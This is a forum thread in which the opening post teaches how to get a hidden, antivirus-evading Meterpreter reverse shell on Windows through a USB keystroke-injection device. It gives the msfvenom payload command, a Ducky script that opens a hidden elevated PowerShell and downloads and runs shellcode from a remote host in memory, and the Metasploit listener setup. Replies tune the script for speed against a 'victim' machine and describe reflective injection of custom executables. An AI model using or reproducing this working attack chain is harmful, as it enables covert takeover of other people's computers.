Jump to content

Undetected + Hidden Meterpreter Shell under 10 seconds


GunZofPeace
 Share

Recommended Posts

Hello again friends! Today I will give a tutorial on how to create a payload that executes under 10 seconds and gives you a fully functioning meterpreter shell back to your kali linux machine. This is done under 20 lines of script. It's quite simple and works on any Windows machine with Powershell installed (Windows 7 and above comes preinstalled with this). I tested this first on my Windows 10 machine and works like a charm, fully undetected by antivirus since it writes the script to memory, not to the disk. Let's begin shall we?

Step 1: Fire up Kali Linux and open a terminal. And using msfvenom we are going to create a shellcode. Enter this code:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=XXX LPORT=XXX -f powershell > /root/Desktop/shellcode.txt

The first part "msfvenom" indicates that we are using that specific tool. The -p parameter indicates what payload we are using. Change the "XXX" for the LHOST parameter to your Kali Linux machine, open a terminal and enter "ifconfig" if you are unsure. As for LPORT, you can use whatever you want. Typically you use 443, 8080, 4444. They all work. The -f parameter writes the shellcode in powershell format (obviously since we're using powershell). And the last part after the ">" indicates the location where this payload will be saved in. 

STEP 2: Now we are going to upload the shellcode to github or pastebin (whichever you prefer).

Create a github account if you do not have one at https://github.com/join?source=header-home. After doing that, make a new repository on github and then upload the payload you just made (there are tutorials on google for uploading files). You can upload the file a couple different ways. The easiest is just log on github from your kali machine and upload from there. Or you can save the payload on a USB stick or somehow transfer it to your host machine and upload from there. Or if you use pastebin, upload to that!

STEP 3: Now the fun part! Time to code the ducky. Copy and Paste my code and change the corresponding lines.

 

DELAY 500
GUI x
DELAY 1000
a
DELAY 1000
ALT y
DELAY 1000
STRING powershell -WindowStyle hidden 
ENTER
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1')
ENTER 
DELAY 1000
STRING IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/GunZofPeace/PowerSploit/master/Scripts/Meterp')
ENTER
DELAY 1000
STRING Invoke-Shellcode -Shellcode ($buf) -Force
ENTER 

 

 

What is going here in we are calling the windows + x button, then typing "a", which opens the CMD with admin privileges. Which is awesome for us. It then fires up the command to start up powershell, BUT IT OPENS IT UP HIDDEN. So the actual powershell window is hidden!!!!!!! The only way to see it is running is through Task Manager. Which is good for us :) After powershell is started up, it downloads the command "Invoke-Shellcode" and injects it into memory. Which doesn't do much by itself. You want to keep this line the same as mine! Copy and paste it exactly. Only for the first IEX string. Now, the second IEX string, you want replace the last link with whatever the link is to your script is on your github account. Remember the one you uploaded? You want to click on github, the button that says "Raw" and get that link! Then replace it between the two apostrophes. Lastly, the last line of code actually executes the payload and this is where you get your shell back on your listener. Or if you used pastebin, just place that link into the code.

 

To set up the listener, open up a terminal in Kali.

>msfconsole

>use exploit/multi/handler

>set payload windows/x64/meterpreter/reverse_https

>set LHOST XXX (whatever IP you used, which would be your kali machine IP)

>set LPORT XXX (whatever port you used)

>exploit

 

And there you go! Of course, have your listener before doing the attack. If you have any questions, please comment! this is my first actual tutorial, so feedback is wanted.

 

Edited by GunZofPeace
Link to comment
Share on other sites

5 hours ago, henna3 said:

Nice script man!, quick question

Do you know if there is any way to convert a custom exe ( of your choice ) to a shellcode script? 

Thanks!

I'm not sure. I don't see why you would do that though if the shellcode already gives you a meterpreter shell. I think the .exe has to be able to be converted into a powershell format, but google it! Sorry I can't help you with this

Link to comment
Share on other sites

5 hours ago, kbeflo said:

Any workarounds on initial run of powershell taking up so much time to open the uac dialog? Either choosing longer payload execution time or plugging in twice.

So for this script I have the DELAY numbers quite high. it all depends on the computer specs, like how fast it is able to start up powershell, enter the commands, etc. Try lowering the DELAY numbers by half. It improves the speed greatly! Just test the script with different DELAYs and see how fast you can get your computer (or victims) computer to run the commands. Try putting 250 for the first four DELAYs. That should run it a lot quicker!

Link to comment
Share on other sites

  • 1 month later...
Quote
On 7.2.2017 at 7:39 AM, GunZofPeace said:

DELAY 500
GUI x
DELAY 1000
a
DELAY 1000
ALT y
DELAY 1000
STRING powershell -WindowStyle hidden 
ENTER
DELAY 1000

 

I think its posible to replace this code with:

 

DELAY 500

GUI R

STRING powershell -WindowSytle hidden

ENTER

DELAY 1000

 

 

It`s a little bit shorter and saves Time :)

Link to comment
Share on other sites

  • 1 month later...
On 2/8/2017 at 8:17 AM, henna3 said:

Nice script man!, quick question

Do you know if there is any way to convert a custom exe ( of your choice ) to a shellcode script? 

Thanks!

If it is unmanaged code, you can do it with Powersploit's Invoke-ReflectivePEInjection.ps1.  The exe will need to be read in as a byte array to be used.  You can load the Powersploit module into memory and then load your own script that will handle pulling down the exe that you already converted to byte array and then to base64 encoding to transfer.  Decode back to byte array and then inject into your current process or select one with the arguments of the exe if any.

If it is managed.  You might can do it with reflections assembly but I only done this with .NET DLLs, do not know if it works with .NET exes.

If you really want the shellcode, it has to be unmanaged code (C, C++, no .NET).  You can use a disassember to get the op codes or use a c compiler to dump the object which will have the op codes.  There are tutorials online on how this is done in more detail both ways.  Anyway it goes, you may have to mess with it to get rid of nulls for it to be workable shellcode.  The first 2 options involve no shellcoding and no disk touching.  It looks like the primary use of this topic is to use meterpreter shellcode which msf can create for you easily.  If you want to easily create shellcode to execute something, take a look at msf's payload windows/exec which can compile an unmanaged exe or even shellcode I believe.

Link to comment
Share on other sites

  • 1 month later...

Hi! Thank you for your post.

I am very new to all this and I could really use some help. I followed your instructions, so I got metasploit to start handler but it does not create a session. I did not get any errors but it seems that scripts, which supposed to be running on Windows, are not communicating back to the handler (that's at least what I think is happening). The problem might be because I saved the cmd code as .bat and .cmd. I run them both but did not notice in task manager that any of them started shell. Not sure what I am doing wrong but if anybody has any idea it would be much appreciated. Thank you.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   1 member

×
×
  • Create New...